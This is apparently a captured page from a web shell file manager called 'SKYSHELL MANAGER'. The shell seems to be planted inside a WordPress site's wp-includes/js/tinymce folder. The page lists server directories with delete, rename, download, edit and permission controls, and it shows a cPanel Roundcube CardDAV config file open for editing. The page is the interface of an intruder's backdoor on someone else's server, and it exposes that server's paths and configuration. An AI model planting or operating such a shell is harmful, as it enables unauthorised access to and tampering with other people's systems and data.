📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: config.inc.php
<?php $prefs['_GLOBAL']['suppress_version_warning'] = false; $prefs['_GLOBAL']['sync_collection_workaround'] = false; $domain = getenv('HTTP_HOST'); if( empty($domain) ) $domain = getenv('DOMAIN'); // Figure out the expected formatting based on username $userName = (string) $_SERVER['_RCUBE']; $userFormat = (string) '%l@%d'; if( strpos($userName, '/') === false) { $userFormat = '%l'; } $prefs['cPCardDAV'] = array( 'name' => 'cPanel CardDAV', 'username' => $userFormat, 'password' => '%p', 'discovery_url' => 'https://127.0.0.1:2080/addressbooks/' . $userFormat . '/addressbook/', 'active' => true, 'fixed' => array( 'name', 'username', 'password' ), 'hide' => false, ); ?>
Save